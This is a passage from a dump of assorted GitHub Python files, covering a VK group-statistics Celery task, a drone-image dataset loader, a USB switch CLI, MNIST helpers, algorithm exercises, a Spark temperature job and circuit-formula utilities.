directory\n\n\n# Use os.path.join to create a complete file path\n\n\n#settings\nreligion= 'hindu'\nreqd_entity_labels= ('WORK_OF_ART','PRODUCT','PERSON','ORG','NORP','LOC','LAW','LANGUAGE','GPE','FAC','EVENT')\ngiven_names= ['ame','arthur','Tristan','Kieran']\naudio_format= '.wav'\n\nsettings= {\n 
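# (hedged note: these appear to be WordNet synset labels to mine; only the\n    # Christian corpus is listed even though 'religion' above is set to 'hindu')\n    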
\"synsets_off_religions\": ['christian']\n}\n\noutput_folder= os.path.join('data_christian','collected words')+os.sep\n# Use the resulting path in your configuration\npaths = {\n \"collected_words_path\": os.path.join(f\"data_{religion}\",'collected words'),\n \"book_directory_for_stories\": os.path.join(f'data_{religion}', \"book\",'story books'),\n \"book_directory_for_namebooks\": os.path.join(f'data_{religion}', \"book\",'name books'),\n \"complete_dictionary\": os.path.join(f'data_{religion}',\"results\",\"distance\",\"names.json\"),\n \"model_names_file\": os.path.join(f'data_{religion}','model_names','model_names.json'),\n \"model_names_folder\": os.path.join(f'data_{religion}','model_names'),\n \"save_directory\": os.path.join(f'data_{religion}','audio_data','doc_audio_data'),\n \"summed_distance_file\": os.path.join(f'data_{religion}','results','summed_distance','summed distance.json'),\n\n \"collected_name_audio_data\": os.path.join(f'data_{religion}',\"audio data\",\"collected name audio data\"),\n \"given name audio data\": os.path.join(f'data_{religion}',\"audio data\",\"given name audio data\"),\n \"summed_distance_file\": os.path.join(f'data_{religion}','results','summed_distance','summed distance.json'),\n \"distance\": os.path.join(f'data_{religion}','results','distance'),\n \"summed_distance\": os.path.join(f'data_{religion}','results','summed_distance'),\n \"person_names\": os.path.join(f'data_{religion}','collected words','person_names.json'),\n \"individual names\": os.path.join(f'data_{religion}','results','distance','each names'),\n \"sorted_by_length\": os.path.join(f'data_{religion}','results','sorted_by_wordlength')\n}\n","repo_name":"RamSankarTheDeveloper/TeenyTinyTitleTrove","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12809948230","text":"from celery import Celery\nimport requests\nfrom celery.schedules import crontab\nimport sqlite3\nfrom configparser import ConfigParser\nfrom exceptions import TakeGroupInfoException\n\n\"\"\"Создание приложения 'periodic' с брокером сообщений RabbitMQ\"\"\"\napp = Celery('periodic', broker=\"pyamqp://guest@localhost//\")\n\n\"\"\"Отключение службы часовых поясов для возможности использовать Celery местное время\"\"\"\napp.conf.enable_utc = False\n\n\n@app.task\ndef take_group_info():\n \"\"\"Получение ответа от VK_API, экстрация из него суммарного числа участников групп ВК\n и внесение этих данных в БД\"\"\"\n\n config = ConfigParser()\n config.read(\"settings.ini\")\n token = config.get(\"VK_API\", \"token\")\n version = config.get(\"VK_API\", \"version\")\n url = config.get(\"VK_API\", \"url\")\n group_ids = \"\".join(config.get(\"VK_API\", \"group_ids\"))\n fields = \"\".join(config.get(\"VK_API\", \"fields\"))\n\n \"\"\"Получение ответа от VK_API\"\"\"\n response = requests.get(url,\n params={\n 'access_token': token,\n 'v': version,\n 'group_ids': group_ids,\n 'fields': fields\n })\n\n \"\"\"Перехват исключений\"\"\"\n if response.status_code != 200:\n raise TakeGroupInfoException(f\"Response has unexcepted status code: {response.status_code}\")\n if not response.json()['response']:\n raise TakeGroupInfoException(\"Response has no dict 'response'.\")\n\n \"\"\"Экстракция данных из объекта response и подготовка их к внесению в БД\"\"\"\n data = response.json()['response']\n history_record = [(item['name'], item['members_count']) for item in data]\n list_groups = 
[(item['name'],) for item in data]\n\n    \"\"\"Connect to the database\"\"\"\n    conn = sqlite3.connect(\"db_parser.db\")\n    cursor = conn.cursor()\n\n    \"\"\"Populate the database\"\"\"\n    cursor.executemany(\"INSERT OR IGNORE INTO group_vk (name) VALUES (?)\", list_groups)\n    cursor.executemany(\"INSERT OR IGNORE INTO history_record (name, members_count) VALUES (?, ?)\", history_record)\n\n    \"\"\"Commit the changes to the database and close it\"\"\"\n    conn.commit()\n    conn.close()\n\n\ndef init_db():\n    \"\"\"Create the database\"\"\"\n    conn = sqlite3.connect(\"db_parser.db\")\n    cursor = conn.cursor()\n\n    cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS group_vk \n                    (name TEXT PRIMARY KEY,\n                    created_db TIMESTAMP DEFAULT (datetime('now','localtime')))\"\"\")\n    cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS history_record \n                    (name TEXT,\n                    members_count INT,\n                    created_db TIMESTAMP DEFAULT (datetime('now','localtime')))\"\"\")\n    conn.commit()\n    conn.close()\n\napp.conf.beat_schedule = {\n    \"take_group_info-in-onetime-everyday-task\": {\n        \"task\": \"periodic.take_group_info\",\n        \"schedule\": crontab(hour=9, minute=13)\n    }\n}\n\nif __name__ == '__main__':\n    init_db()\n\n","repo_name":"ser-guzun/vk_parser","sub_path":"periodic.py","file_name":"periodic.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"36145550284","text":"import os\nfrom PIL import Image \nimport numpy as np \nfrom data.BaseDataset import BaseDataset\nfrom transforms.bounding_box import BBox \n\nimport torch\nimport random\nimport torchvision.transforms as transforms\n\nclass VisDrone(BaseDataset):\n\tdef __init__(self, opt):\n\t\t# read all the image paths\n\t\tself.opt = opt\n\t\tself.img_size = opt.img_size\n\t\tself.dataroot = opt.dataroot\n\t\tself.img_paths = self.get_paths(self.dataroot, '.jpg')\n\t\tself.label_paths = self.replace(self.img_paths)\n\n\t\tself.max_object =100\n\t\tself.multiscale = not opt.nomultiscale\n\t\tself.normalized_labels = opt.normalized_labels\n\t\tself.min_size = opt.img_size - 3 * 32\n\t\tself.max_size = opt.img_size + 3 * 32\n\t\t# Non maximum merge\n\t\t# NMM()\n\n\t# our assumption here is that:\n\t# the GPU device on UAVs can be very limited\n\t# and we want to make the large images as small as possible\n\t# so we split the images into small parts and deal with it\n\t# def __getitem__(self, index):\n\t# \timg_path = self.img_paths[index]\n\t# \tif not os.path.exists(img_path):\n\t# \t\tassert RuntimeError(\"Image path not find\")\n\t# \tlabel_path = self.label_paths[index]\n\t# \tif not os.path.exists(label_path):\n\t# \t\tassert RuntimeError(\"label path not find\")\n\n\t# \timg = Image.open(img_path).convert('RGB')\n\t# \tbboxes = BBox.from_visDrone(np.loadtxt(label_path, delimiter=',').reshape(-1,8), img.size)\n\t# \ttargets = bboxes.non_max_merge(box_size=540, iou_thresh=0.5).to_tensor()\n\tdef __getitem__(self, index):\n\t\timg_path = self.img_paths[index]\n\t\tif not os.path.exists(img_path):\n\t\t\traise RuntimeError('Image path not found')\n\n\t\tlabel_path = self.label_paths[index]\n\t\tif not os.path.exists(label_path):\n\t\t\traise RuntimeError('Label path not found')\n\n\t\timg = Image.open(img_path).convert('RGB')\n\t\tbboxes = BBox.from_visDrone(np.loadtxt(label_path, delimiter=',').reshape(-1,8), img.size)\n\n\t\t# target \n\t\t# still need the NMM to get the cluster\n\t\t\n\t\ttarget = bboxes.to_tensor()\n\t\tprint(target[0])\n\t\timg = transforms.ToTensor()(img)\n\n\t\t# handle gray scale 
channels\n\t\tif len(img.shape) != 3:\n\t\t\timg = img.unsqueeze(0)\n\t\t\timg = img.expand(3, *img.shape[1:])\n\n\t\t# add pad\n\t\t_, h, w = img.shape\n\t\th_factor, w_factor = (h, w) if self.normalized_labels else (1, 1)\n\t\timg, pad = self.pad_to_square(img, 0)\n\t\t_, padded_h, padded_w = img.shape\n\n\t\t# we only need to know whether there is a cluster or not\n\t\tx1 = w_factor * (target[:, 1] - target[:, 3] / 2)\n\t\tx2 = w_factor * (target[:, 1] + target[:, 3] / 2)\n\t\ty1 = h_factor * (target[:, 2] - target[:, 4] / 2)\n\t\ty2 = h_factor * (target[:, 2] + target[:, 4] / 2)\n\n\t\tx1 += pad[0]\n\t\tx2 += pad[0]\n\t\ty1 += pad[2]\n\t\ty2 += pad[2]\n\n\t\ttarget[:, 0] = 1\n\t\t# convert back to normalized (cx, cy, w, h) relative to the padded image\n\t\ttarget[:, 1] = ((x1 + x2) / 2) / padded_w\n\t\ttarget[:, 2] = ((y1 + y2) / 2) / padded_h\n\t\ttarget[:, 3] *= w_factor / padded_w\n\t\ttarget[:, 4] *= h_factor / padded_h\n\n\t\timg_idx = torch.zeros(target.size(0), 1)\n\t\ttarget = torch.cat((img_idx, target), -1)\n\n\t\treturn img, target\n\n\tdef __len__(self):\n\t\treturn len(self.img_paths)\n\n\tdef name(self):\n\t\treturn 'visDroneDataset'\n\n\tdef collate_fn(self, batch):\n\t\timgs, targets = list(zip(*batch))\n\t\tcount = 0\n\t\tfor i, bboxes in enumerate(targets):\n\t\t\tbboxes[:, 0] = i\n\n\t\tif self.multiscale:\n\t\t\tself.img_size = random.choice(range(self.min_size, self.max_size + 1, 32))\n\n\t\timgs = torch.stack([self.resize(img, self.img_size) for img in imgs])\n\t\ttargets = torch.cat(targets, 0)\n\n\t\treturn imgs, targets\n\n\tdef get_paths(self, path, suffix='.jpg'):\n\t\timage_paths = []\n\t\tfor dirpath, subdirs, files in os.walk(path):\n\t\t\tfor file in files:\n\t\t\t\tif suffix in file:\n\t\t\t\t\timage_paths.append('/'.join([dirpath, file]))\n\t\treturn image_paths\n\n\tdef replace(self, paths, image='images/', label='annotations/'):\n\t\tlabel_path = []\n\t\tfor path in paths:\n\t\t\t# replace .jpg to .txt\n\t\t\tp = path[:-4]+'.txt'\n\t\t\tp = p.replace(image, label)\n\t\t\tlabel_path.append(p)\n\t\treturn label_path","repo_name":"tonyyang1995/AnchorFree","sub_path":"data/visDroneDataset.py","file_name":"visDroneDataset.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16370558726","text":"#!/usr/local/bin/python3.7\n# require py-hidapi\n\nimport sys\nimport hid\nimport argparse\nfrom time import sleep\n\nclass ATENUsbSwitch(object):\n    def __init__(self, vendor_id=1367, product_id=9223):\n        self.vendor_id = vendor_id\n        self.product_id = product_id\n        self.device = None\n\n    def __del__(self):\n        self._close()\n\n    def _open(self):\n        self.device = hid.device()\n        for dev in hid.enumerate(self.vendor_id, self.product_id):\n            if dev[\"interface_number\"] == 1:\n                self.device.open_path(dev[\"path\"])\n\n    def _close(self):\n        if self.device:\n            self.device.close()\n\n    def is_active(self):\n        try:\n            self._open()\n            status = self.device.read(4)\n            self._close()\n        except ValueError as e:\n            return False\n        else:\n            return (status[1] & 0x01)\n\n    def is_locked(self):\n        try:\n            self._open()\n            status = self.device.read(4)\n            self._close()\n        except ValueError as e:\n            return False\n        else:\n            return (status[1] & 0x02)\n\n    def switch(self, wait=True):\n        self._open()\n        self.device.write([0x02, 0x11])\n        self._close()\n        wait_for_active = wait\n        while wait_for_active:\n            sleep(3)\n            try:\n                if self.is_active():\n                    wait_for_active = False\n            except OSError as e:\n                continue\n\n    def lock(self):\n        self._open()\n        
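# NOTE (editor's assumption): 0x11 is the same opcode that switch() sends above;\n        # if the hardware defines a separate lock command, this byte likely differs.\n        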
self.device.write([0x02, 0x11])\n self._close()\n\n def unlock(self):\n self._open()\n self.device.write([0x02, 0x20])\n self._close()\n\n def keep_locked(self):\n self._open()\n self.lock()\n while True:\n sleep(4)\n self.device.write([0x02, 0x40])\n self._close()\n\n\nif __name__ == \"__main__\":\n usbsw = ATENUsbSwitch()\n argp = argparse.ArgumentParser(description=\"ATEN USB Switch CLI\")\n argp.add_argument(\"-a\", \"--is-active\", dest=\"do_check\", action=\"store_true\", help=\"return 0 if we are the active host\")\n argp.add_argument(\"-s\", \"--switch\", dest=\"do_switch\", action=\"store_true\", help=\"switch ourselves to be the active host\")\n argp.add_argument(\"--carp\", dest=\"carp_mode\", action=\"store\", choices=[\"MASTER\", \"BACKUP\"],\n help=\"cleam switch based on CARP VIP status\")\n argp.add_argument(\"-v\", \"--verbose\", dest=\"be_verbose\", action=\"store_true\", help=\"verbose console messages\")\n args = argp.parse_args()\n\n if args.carp_mode:\n args.do_switch = True if args.carp_mode == \"MASTER\" else False\n args.do_check = True if args.carp_mode == \"BACKUP\" else False\n\n if args.do_check and args.do_switch and args.be_verbose:\n print(\"WARNING: both --is-active and --switch provided, ignoring --switch!\", file=sys.stderr)\n\n if args.do_check:\n if usbsw.is_active():\n if args.be_verbose:\n print(\"This host is active.\")\n sys.exit(0)\n else:\n if args.be_verbose:\n print(\"Another host is active.\")\n sys.exit(1)\n elif args.do_switch:\n if not usbsw.is_active():\n if args.be_verbose:\n print(\"Switching this host to active...\")\n usbsw.switch()\n if usbsw.is_active():\n if args.be_verbose:\n print(\"This host is now active.\")\n sys.exit(0)\n else:\n if args.be_verbose:\n print(\"ERROR: Failed to switch!\", file=sys.stderr)\n sys.exit(1)\n else:\n argp.print_help()\n sys.exit(2)\n","repo_name":"sjorge/aten-us221a-switcher","sub_path":"atenusbsw.py","file_name":"atenusbsw.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24402629655","text":"import torch\n\n\ndef load_mnist(is_train=True, flatten=True):\n from torchvision import datasets, transforms\n\n dataset = datasets.MNIST(\n '../data', train=is_train, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n ]),\n )\n\n x = dataset.data.float() / 255.\n y = dataset.targets\n\n if flatten:\n x = x.view(x.size(0), -1)\n\n return x, y\n\n\ndef split_data(x, y, train_ratio=.8):\n train_cnt = int(x.size(0) * train_ratio)\n valid_cnt = x.size(0) - train_cnt\n\n # Shuffle dataset to split into train/valid set.\n indices = torch.randperm(x.size(0))\n x = torch.index_select(\n x,\n dim=0,\n index=indices\n ).split([train_cnt, valid_cnt], dim=0)\n y = torch.index_select(\n y,\n dim=0,\n index=indices\n ).split([train_cnt, valid_cnt], dim=0)\n\n return x, y\n\n\ndef get_hidden_sizes(input_size, output_size, n_layers):\n step_size = int((input_size - output_size) / n_layers)\n\n hidden_sizes = []\n current_size = input_size\n for i in range(n_layers - 1):\n hidden_sizes += [current_size - step_size]\n current_size = hidden_sizes[-1]\n\n return hidden_sizes\n","repo_name":"Daehyun-Bigbread/Deep-Learning-AI-","sub_path":"Deep_learning Kindergarden/16-practical_exercise/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"26088280500","text":"def 
linear_Search(list1, n, key): \n \n # Searching list1 sequentially \n for i in range(0, n): \n if (list1[i] == key): \n return i \n return -1 \n \n \nlist1=int(input(\"Enter a nos\")) \n#list1 = [1 ,3, 5, 4, 7, 9] \n#key = 7 \nkey=int(input(\"Enter a key value\")) \n \nn = len(list1) \nres = linear_Search(list1, n, key) \nif(res == -1): \n print(\"Element not found\") \nelse: \n print(\"Element found at index: \", res) \n","repo_name":"manishaachar/manishaachar","sub_path":"ADJAVA/Manisha/p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"21836388559","text":"import sys\nsys.stdin = open('../input.txt', 'r')\n\n\nds = [(1, 1), (1, -1), (-1, -1), (-1, 1)] # 대각선\n\n\ndef is_field(i, j):\n return 0 <= i < N and 0 <= j < N\n\n\ndef gerrymandering(boundary, d1, d2):\n global min_diff\n city_num = [0] * 6\n # 1번 구역\n for r in range(si+d1):\n for c in range(sj+1):\n if (r, c) in boundary: break\n city_num[1] += A[r][c]\n\n # 2번 구역\n for r in range(si+d2+1):\n for c in range(N-1, sj, -1):\n if (r, c) in boundary: break\n city_num[2] += A[r][c]\n\n # 3번 구역\n for r in range(si+d1, N):\n for c in range(sj-d1+d2):\n if (r, c) in boundary: break\n city_num[3] += A[r][c]\n\n # 4번 구역\n for r in range(N-1, si+d2, -1):\n for c in range(N-1, sj-d1+d2-1, -1):\n if (r, c) in boundary: break\n city_num[4] += A[r][c]\n\n city_num[5] = total_num - sum(city_num)\n\n diff = max(city_num) - min(city_num[1:])\n\n print(city_num)\n\n if diff < min_diff:\n min_diff = diff\n\n\ndef set_boundary(i, j, direction, d1, d2):\n boundary.append((i, j))\n if direction == 3 and i + ds[3][0] == si and j + ds[3][1] == sj:\n gerrymandering(boundary, d1, d2)\n else:\n di, dj = ds[direction]\n ni, nj = i + di, j + dj\n if is_field(ni, nj):\n if direction == 1: d1 += 1\n if direction == 0: d2 += 1\n set_boundary(ni, nj, direction, d1, d2)\n if direction != 3: set_boundary(ni, nj, direction+1, d1, d2)\n boundary.pop()\n\n\nN = int(input())\nA = [list(map(int, input().split())) for _ in range(N)]\n# city_num = [0] * 6 # 인구수\ntotal_num = sum(sum(A, []))\nboundary = [] # 경계선\nmin_diff = 1e9\n\nfor i in range(N):\n for j in range(N):\n si, sj = i, j\n set_boundary(i, j, 0, 0, 0)\n\nprint(min_diff)","repo_name":"liza0525/algorithm-study","sub_path":"BOJ/boj_17779_gerrymandering2.py","file_name":"boj_17779_gerrymandering2.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"40946517134","text":"r\"\"\"\nModules for computations about slope stability.\n\nEXAMPLES::\n\n\n\n.. TODO::\n - Add examples.\n\"\"\"\n\n# ****************************************************************************\n# Copyright (C) 2021 Benjamin Schmidt \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. 
If not, see .\n# ****************************************************************************\n\n# noinspection PyUnresolvedReferences\nimport sage.all\n# noinspection PyUnresolvedReferences\nfrom sage.functions.other import imag_part, real_part\n# noinspection PyUnresolvedReferences\nfrom sage.symbolic.constants import I\n# noinspection PyUnresolvedReferences\nfrom sage.rings.infinity import infinity\n\n\ndef delta(v, w=None):\n r\"\"\"\n Computes the Bogomolov discriminant :math:`\\Delta(v, w)`.\n\n TESTS::\n\n sage: from stability_conditions import *\n\n sage: v = Element([1, -1, 1/2, 5, 3, 4])\n sage: slope.delta(v, v)\n 0\n sage: slope.delta(v)\n 0\n\n sage: v = Element([1, 0, -10])\n sage: slope.delta(v)\n 20\n\n sage: v = Element([2, -1, -1/2])\n sage: w = Element([1, 1, -1/2])\n sage: slope.delta(v, w)\n 1/2\n\n sage: var('r, c, d', domain = RR)\n (r, c, d)\n sage: v = Element([r, c, d])\n sage: bool(slope.delta(v) == c^2 - 2*r*d)\n True\n \"\"\"\n if w is None:\n return delta(v, v)\n else:\n return v[1]*w[1] - v[0]*w[2] - v[2]*w[0]\n\n\ndef mu(v):\n r\"\"\"\n Computes the Mumford slope of `v`.\n\n TESTS::\n\n sage: from stability_conditions import *\n\n sage: slope.mu(Element([1, -1]))\n -1\n sage: slope.mu(Element([3, -1, -1/2, -1/6]))\n -1/3\n sage: slope.mu(Element([-1, 5]))\n -5\n sage: slope.mu(Element([0, 1]))\n +Infinity\n\n sage: var('r, c', domain = RR)\n (r, c)\n sage: slope.mu(Element([r, c]))\n c/r\n \"\"\"\n central_charge = z(v)\n if imag_part(central_charge) == 0:\n return infinity\n return -real_part(central_charge)/imag_part(central_charge)\n\n\ndef z(v):\n r\"\"\"\n Computes the central charge for slope stability.\n\n TESTS::\n\n sage: from stability_conditions import *\n\n sage: slope.z(Element([4, -2, 3, 4, 8]))\n 4*I + 2\n\n sage: slope.z(Element([0, 4]))\n -4\n\n sage: slope.z(Element([-5, 1/2, 4, 3/2]))\n -5*I - 1/2\n \"\"\"\n return -v[1] + I*v[0]\n","repo_name":"benjaminschmidt/stability_conditions","sub_path":"stability_conditions/slope.py","file_name":"slope.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14667390609","text":"from google.colab import files\r\nfrom .tools import bcolors, Metrics\r\nfrom .loader import CsvLoader, XlsxLoader\r\nfrom .terra import TerraDataset, TerraModelKol, TerraModelKNPEF, TerraModelKNPEF\r\nfrom . import utils\r\nimport pathlib\r\n\r\nclass Worker:\r\n XLSX_EXTENSION = '.xlsx' # Расширение экселек\r\n CSV_EXTENSION = '.csv' # Расширение csv-шек\r\n messages = {\r\n 'unknown_extension': f'{bcolors.FAIL}Неизвестное расширение файла. 
Требуется {bcolors.BOLD}*.csv{bcolors.ENDC}{bcolors.FAIL} или {bcolors.BOLD}*.xlsx{bcolors.ENDC}',\r\n 'create_x_set': f'{bcolors.OKBLUE}Создание набора данных:{bcolors.ENDC}',\r\n 'done': f'{bcolors.OKGREEN}{bcolors.BOLD}Done{bcolors.ENDC}',\r\n 'kollector_predict': f'{bcolors.OKBLUE}Определение коллекторов:{bcolors.ENDC}', \r\n 'knpef_predict': f'{bcolors.OKBLUE}Определение параметров KNEF и KPEF:{bcolors.ENDC}', \r\n 'visualize': f'{bcolors.OKBLUE}Построение планшета...{bcolors.ENDC}', \r\n 'download': f'{bcolors.OKBLUE}Подготовка результирующего файла:{bcolors.ENDC}',\r\n }\r\n\r\n def __init__(self, filename):\r\n self.loader = None # Загрузчик данных\r\n self.x_set = None\r\n self.fname = filename\r\n self.load_data(filename)\r\n self.create_sets()\r\n\r\n self.result = self.loader.get_dataframe().copy()\r\n self.model80 = TerraModelKol(\r\n filename='geology/models/model_for_80_kollector.h5',\r\n kollector=80)\r\n self.model4 = TerraModelKol(\r\n filename='geology/models/model_for_4_kollector.h5',\r\n kollector=4)\r\n self.kollector_predict()\r\n\r\n self.modelKPEF = TerraModelKNPEF(\r\n model_path='geology/models/model_kpef_w.h5'\r\n )\r\n self.modelKNEF = TerraModelKNPEF(\r\n model_path='geology/models/model_knef_w.h5'\r\n )\r\n self.knpef_predict()\r\n self.download()\r\n\r\n\r\n \r\n def load_data(self, filename):\r\n file_extension = pathlib.Path(filename).suffix # Получение расширение файла\r\n # Создание загрузчика, в зависимости от расширения\r\n if file_extension == self.__class__.XLSX_EXTENSION:\r\n self.loader = XlsxLoader(filename)\r\n elif file_extension == self.__class__.CSV_EXTENSION:\r\n self.loader = CsvLoader(filename)\r\n else:\r\n print(self.__class__.messages['unknown_extension'])\r\n\r\n def create_sets(self):\r\n print(self.__class__.messages['create_x_set'], end=' ')\r\n ds = TerraDataset(self.loader.get_dataframe())\r\n self.x_set = ds.get_x_set()\r\n print(self.__class__.messages['done'])\r\n\r\n def kollector_predict(self):\r\n print(self.__class__.messages['kollector_predict'], end=' ')\r\n pred80 = self.model80.predict(self.x_set)\r\n pred4 = self.model4.predict(self.x_set)\r\n pred80[pred80==0] = pred4[pred80==0]\r\n pred80[pred80==0]=79\r\n self.result['Коллекторы (модель)'] = pred80\r\n print(self.__class__.messages['done'])\r\n\r\n def knpef_predict(self) :\r\n print(self.__class__.messages['knpef_predict'], end=' ')\r\n pred_kpef = self.modelKPEF.predict(self.x_set)\r\n pred_kpef = pred_kpef*2 - 1\r\n pred_kpef[pred_kpef<0]=0\r\n self.result['KPEF (модель)'] = pred_kpef\r\n pred_knef = self.modelKNEF.predict(self.x_set)\r\n pred_knef = pred_knef*2 - 1\r\n pred_knef[pred_knef<0]=0\r\n self.result['KNEF (модель)'] = pred_knef\r\n print(self.__class__.messages['done'])\r\n\r\n def view_result(self, show_accuracy=True):\r\n if show_accuracy:\r\n self.get_accuracy()\r\n display(self.result.head())\r\n print(self.__class__.messages['visualize'], end=' ')\r\n visualizer = utils.Visualizer()\r\n df_view = self.result.copy()\r\n if 'Коллекторы' in df_view.columns:\r\n df_view['Коллекторы'].replace(79, 2, inplace=True)\r\n df_view['Коллекторы'].replace(75, 2, inplace=True)\r\n df_view['Коллекторы (модель)'].replace(79, 2, inplace=True)\r\n visualizer.createtablet(df = df_view, \r\n collector_predict = df_view['Коллекторы (модель)'],\r\n KNEF_predict = df_view['KPEF (модель)'],\r\n KPEF_predict = df_view['KNEF (модель)'])\r\n\r\n def download(self):\r\n print(self.__class__.messages['download'], end=' ')\r\n 
self.result.to_excel(f'{self.fname.split(\".\")[:-1][0]}_predict.xlsx')\r\n files.download(filename=f'{self.fname.split(\".\")[:-1][0]}_predict.xlsx')\r\n print(self.__class__.messages['done'])\r\n\r\n\r\n def get_accuracy(self):\r\n if 'Коллекторы' in self.result.columns:\r\n self.result['Коллекторы'].replace(2, 79, inplace=True)\r\n Metrics.accuracy(self.result['Коллекторы'].values, self.result['Коллекторы (модель)'].values)\r\n if 'KPEF' in self.result.columns:\r\n Metrics.tpe(self.result['KPEF'].values, self.result['KPEF (модель)'].values, ' KPEF')\r\n if 'KNEF' in self.result.columns:\r\n Metrics.tpe(self.result['KNEF'].values, self.result['KNEF (модель)'].values, ' KNEF')\r\n","repo_name":"gitterra/geology","sub_path":"worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":5259,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30054201301","text":"#Spark_task3_min_temperatures: minimum temperature observed at different\n# weather station in the year 1800\n\nfrom pyspark import SparkConf, SparkContext\n\nconf = SparkConf().setMaster(\"local\").setAppName(\"MinTemperatures\")\nsc = SparkContext(conf = conf)\n\ndef parseLine(line):\n fields = line.split(',')\n stationID = fields[0]\n entryType = fields[2]\n temperature = fields[3]\n return (stationID, entryType, temperature)\n\n#create rdd\nlines = sc.textFile(\"hdfs:///projects/1800.csv\")\n#parse through the file, out put (stationID, entryType, temperature)\nparsedLines = lines.map(parseLine)\n#filter out, only keep entryType with \"TMIN\"\nminTemps = parsedLines.filter(lambda x: \"TMIN\" in x[1])\n#apply a new map(stationID,temperature)\nstationTemps = minTemps.map(lambda x: (x[0], x[2]))\n#find the mininum station temp\nminTemps = stationTemps.reduceByKey(lambda x, y: min(x,y))\n#collect result\nresults = minTemps.collect();\n#iteration, 2 decimal place right of the decimal point\nfor result in results:\n print(result[0] + \"\\t{:.2f}F\".format(result[1]))\n","repo_name":"Alice-yz-Wong/hadoop","sub_path":"Spark/Spark_task3_min_temperatures/min_temperatures.py","file_name":"min_temperatures.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13581827590","text":"import math\nfrom Util import detect_verbose, inv_sum_inv, complex_arithmetic, phasor_arithmetic, phasor_to_rectangular\n\n\n@detect_verbose\ndef R(v: float=None, i: float=None, p: float=None) -> float:\n \"\"\"\n Compute the resistance, given any two of voltage, current, and power\n \"\"\"\n if v is not None and i is not None:\n return v / i\n if v is not None and p is not None: \n return v ** 2 / p\n if i is not None and p is not None: \n return p / (i ** 2)\n return None\n\n\n@detect_verbose\ndef G(v: float=None, i:float=None, p:float=None) -> float:\n \"\"\"\n Compute the conductance, given any two of voltage, current, and power\n \"\"\"\n return 1 / R(v=v, i=i, p=p)\n \n\n@detect_verbose\ndef V(\n r: float=None, \n i: float=None, \n p: float=None, \n c: float=None, \n q: float=None, \n l: float=None, \n di: float=None\n ) -> float:\n \"\"\"\n Compute the voltage, given the parameters\n \"\"\"\n if r is not None and i is not None: \n return r * i\n if r is not None and p is not None: \n return math.sqrt(r * p)\n if i is not None and p is not None: \n return p / (i ** 2)\n if c is not None and q is not None: \n return q / c\n if l is not None and di is not None: \n return l * di\n return 
None\n\n\n@detect_verbose\ndef I(r: float=None, v: float=None, p: float=None) -> float:\n \"\"\"\n Compute the current, given any two of resistance, voltage, and power\n \"\"\"\n if r is not None and v is not None:\n return v / r\n if v is not None and p is not None:\n return p / v\n if r is not None and p is not None:\n return math.sqrt(p / r)\n return None\n\n\n@detect_verbose\ndef P(r: float=None, v: float=None, i: float=None) -> float:\n \"\"\"\n Compute the power, given any two of resistance, voltage, and current\n \"\"\"\n if r is not None and v is not None:\n return v ** 2 / r\n if v is not None and i is not None:\n return i * v\n if r is not None and i is not None:\n return i ** 2 * r\n return None\n\n\n@detect_verbose\ndef C(v: float=None, q: float=None) -> float:\n \"\"\"\n Compute the capacitance of a linear capacitor, given the voltage and charge\n \"\"\"\n if v is not None and q is not None:\n return q / v\n return None\n\n\n@detect_verbose\ndef Q(v: float=None, c: float=None) -> float:\n \"\"\"\n Compute the charge stored on a linear capacitor, given the voltage and capacitance\n \"\"\"\n if v is not None and c is not None:\n return c * v\n return None\n\n\n@detect_verbose\ndef E(\n c: float=None, \n v: float=None, \n i: float=None,\n p: float=None,\n r: float=None, \n t: float=None, \n l: float=None,\n ) -> float:\n \"\"\"\n Compute the energy, given the parameters \n \"\"\"\n if c is not None and v is not None: \n return 0.5 * c * v ** 2\n if l is not None and i is not None: \n return 0.5 * l * i ** 2\n if p is not None and t is not None: \n return p * t\n if t is not None: \n return t * P(r=r, v=v, i=i)\n return None\n\n\n@detect_verbose\ndef parallel(\n rs: list[float]=None,\n cs: list[float]=None,\n ls: list[float]=None,\n ) -> float:\n \"\"\"\n Compute the equivalent resistance, capacitance, or inductance in parallel\n \"\"\"\n if rs is not None:\n return inv_sum_inv(rs)\n if ls is not None: \n return sum(ls)\n if cs is not None:\n return inv_sum_inv(cs)\n return None\n\n\n@detect_verbose\ndef series(\n rs: list[float]=None,\n cs: list[float]=None,\n ls: list[float]=None,\n ) -> float:\n \"\"\"\n Compute the equivalent resistance, capacitance, or inductance in series \n \"\"\"\n if rs is not None:\n return sum(rs)\n if ls is not None:\n return 